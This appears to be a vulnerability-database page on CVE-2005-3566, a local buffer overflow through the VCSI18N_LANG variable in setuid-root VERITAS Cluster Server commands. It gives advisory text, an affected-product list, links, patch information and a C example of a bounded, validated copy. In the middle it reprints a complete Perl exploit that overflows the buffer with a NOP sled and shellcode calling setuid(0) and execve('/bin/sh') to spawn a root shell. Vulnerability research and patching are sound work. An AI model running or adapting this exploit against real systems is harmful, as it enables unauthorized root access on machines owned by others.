CVE-2005-3566
CVSS 4.3
Published: 2005-11-16 02:42:00
Revised: 2016-10-17 23:36:13
NMCOE    

[Original] Buffer overflow in various ha commands of VERITAS Cluster Server for UNIX before 4.0MP2 allows local users to execute arbitrary code via a long VCSI18N_LANG environment variable to (1) haagent, (2) haalert, (3) haattr, (4) hacli, (5) hacli_runcmd, (6) haclus, (7) haconf, (8) hadebug, (9) hagrp, (10) hahb, (11) halog, (12) hareg, (13) hares, (14) hastatus, (15) hasys, (16) hatype, (17) hauser, and (18) tststew.


[CNNVD] Veritas Cluster Server for UNIX ha Command Local Buffer Overflow Vulnerability (CNNVD-200511-213)

        Veritas Cluster Server is a storage management solution that manages clusters of nodes.
        Veritas Cluster Server contains a local buffer overflow vulnerability. Several ha commands do not perform proper bounds checking when handling the VCSI18N_LANG environment variable. Because the affected code runs with administrator privileges (setuid root), a local attacker can disrupt backup/storage functions or gain elevated privileges on the target server.
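The defect the advisory describes, an unbounded copy of the VCSI18N_LANG value into a fixed buffer inside a setuid-root program, shown next to a bounded and validated replacement. This is an added C example, not VCS code; the 72-byte buffer size is an assumption taken from the padding length used in the published exploit, and the caller is assumed to pass the result of getenv("VCSI18N_LANG").

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size: the published exploit pads 72 bytes before its return address. */
#define LANG_BUF_LEN 72

/* Vulnerable pattern from the advisory: unbounded copy of an environment value into
 * a fixed buffer. Shown for contrast only; never called below. */
void vulnerable_load_lang(char out[LANG_BUF_LEN], const char *value)
{
    strcpy(out, value);   /* overflows once strlen(value) >= LANG_BUF_LEN */
}

/* Hardened replacement: the value must be NUL-terminated inside the buffer and use
 * locale-name characters only (e.g. "en_US.UTF-8"); otherwise fall back to "C".
 * Returns 1 if the caller's value was used, 0 if the fallback was used. */
int hardened_load_lang(char out[LANG_BUF_LEN], const char *value)
{
    const char *end;
    size_t n;
    if (value == NULL)
        goto fallback;
    end = memchr(value, '\0', LANG_BUF_LEN);   /* never scan past the buffer size */
    if (end == NULL || end == value)           /* too long, or empty */
        goto fallback;
    n = (size_t)(end - value);
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.' && c != '@')
            goto fallback;                     /* rejects "/bin/sh", raw bytes, etc. */
    }
    memcpy(out, value, n + 1);
    return 1;
fallback:
    strcpy(out, "C");
    return 0;
}

/* Check helper: is a run of 'len' bytes of 'A' accepted? (1 yes, 0 no, -1 OOM) */
int accepts_run_of_a(size_t len)
{
    char out[LANG_BUF_LEN], *v = malloc(len + 1);
    int r;
    if (v == NULL) return -1;
    memset(v, 'A', len); v[len] = '\0';
    r = hardened_load_lang(out, v);
    free(v);
    return r;
}
```

The same bounded-copy-plus-allowlist pattern applies to any environment variable a setuid program reads, not only to locale settings.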

- CVSS (base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:symantec_veritas:cluster_server:2.2_linux
cpe:/a:symantec_veritas:storage_foundation:4.0_solaris
cpe:/a:symantec_veritas:cluster_server:4.0_linux
cpe:/a:symantec_veritas:cluster_server:4.0_aix_beta
cpe:/a:symantec_veritas:cluster_server:4.0_solaris_beta
cpe:/a:symantec_veritas:storage_foundation:3.4_aix
cpe:/a:symantec_veritas:cluster_server:3.5_mp1j
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_beta
cpe:/a:symantec_veritas:cluster_server:4.0_linux_beta
cpe:/a:symantec_veritas:storage_foundation:1.0_aix
cpe:/a:symantec_veritas:storage_foundation:4.0_linux
cpe:/a:symantec_veritas:cluster_server:4.0_solaris
cpe:/a:symantec_veritas:cluster_server:3.5_hp-ux_update_2
cpe:/a:symantec_veritas:sanpoint_control_quickstart:3.5_solaris
cpe:/a:symantec_veritas:cluster_server:3.5_aix
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_mp3
cpe:/a:symantec_veritas:cluster_server:3.5
cpe:/a:symantec_veritas:storage_foundation_cluster_file_system:4.0_aix
cpe:/a:symantec_veritas:cluster_server:2.2_linux_mp1p1
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_mp2
cpe:/a:symantec_veritas:storage_foundation:4.0_aix
cpe:/a:symantec_veritas:storage_foundation:3.5_hp-ux
cpe:/a:symantec_veritas:storage_foundation:3.5_solaris
cpe:/a:symantec_veritas:storage_foundation_cluster_file_system:4.0_solaris
cpe:/a:symantec_veritas:cluster_server:2.2
cpe:/a:symantec_veritas:cluster_server:3.5_solaris_mp1
cpe:/a:symantec_veritas:cluster_server:4.0_solaris_mp1
cpe:/a:symantec_veritas:cluster_server:3.5_hp-ux
cpe:/a:symantec_veritas:cluster_server:3.5_solaris
cpe:/a:symantec_veritas:cluster_server:2.2_mp1
cpe:/a:symantec_veritas:cluster_server:4.0_aix
cpe:/a:symantec_veritas:storage_foundation_cluster_file_system:4.0_linux
cpe:/a:symantec_veritas:cluster_server:3.5_hp-ux_update_1
cpe:/a:symantec_veritas:storage_foundation:3.0_aix
cpe:/a:symantec_veritas:cluster_server:3.5_mp1
cpe:/a:symantec_veritas:storage_foundation:2.2_linux
cpe:/a:symantec_veritas:cluster_server:2.2_mp2
cpe:/a:symantec_veritas:cluster_server:3.5_mp2
cpe:/a:symantec_veritas:storage_foundation:2.2_vmware_esx
cpe:/a:symantec_veritas:cluster_server:3.5_p1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3566
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3566
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-213
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=113199516516880&w=2
(UNKNOWN)  BUGTRAQ  20051112 DMA[2005-1112a] - 'Veritas Storage Foundation VCSI18N_LANG buffer overflow'
http://securityreason.com/securityalert/174
(UNKNOWN)  SREASON  174
http://securityresponse.symantec.com/avcenter/security/Content/2005.11.08a.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2005.11.08a.html
http://securitytracker.com/id?1015169
(PATCH)  SECTRACK  1015169
http://www.securityfocus.com/bid/15349
(UNKNOWN)  BID  15349
http://www.vupen.com/english/advisories/2005/2350
(UNKNOWN)  VUPEN  ADV-2005-2350
http://xforce.iss.net/xforce/xfdb/22986
(UNKNOWN)  XF  veritas-ha-bo(22986)

- Vulnerability information

Veritas Cluster Server for UNIX ha Command Local Buffer Overflow Vulnerability
Medium  Buffer overflow
2005-11-16 00:00:00 2006-03-27 00:00:00
Local

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:
        http://support.veritas.com/docs/279870

- Vulnerability information (1316)

Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit (EDBID:1316)
linux local
2005-11-12 Verified
0 Kevin Finisterre
N/A
#!/usr/bin/perl -w
#
# Veritas Storage Foundation 4.0 
#
# http://www.digitalmunition.com
# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005
#
# This bug has not been patched as of:
# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz
#
# Make sure you don't get your sploits from some
# Frenchie at FR-SIRT go to milw0rm instead.
#
$retval = 0xbffffc17;

$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72";
$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72";
$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72";
$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72";
$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72";
$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72";
$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72";
$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72";
$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72";
$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72";
$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72";
$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72";
$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72";
$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72";
$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72";
$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72";
$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72";

unless (($target) = @ARGV) {

        print "\n        Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n";
        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n\n";

$sc = "\x90"x1024;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "A" x $b;
$buf .= "$ret" x 2;

$ENV{"VCSI18N_LANG"} = $buf;
$ENV{"DMR0x"} = $sc;

exec("$a DMR0x");

# milw0rm.com [2005-11-12]

- Vulnerability information

20673
VERITAS Cluster Server for UNIX Multiple ha Command VCSI18N_LANG Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public, Exploit Unknown

- Vulnerability description

A local overflow exists in Veritas Cluster Server for UNIX. The issue is triggered when the application fails to properly check bounds of user-supplied data when handling the VCSI18N_LANG environment variable, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code to be executed, resulting in a loss of integrity.

- Timeline

2005-11-08 2005-08-19
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability.

- Related references

- Vulnerability author
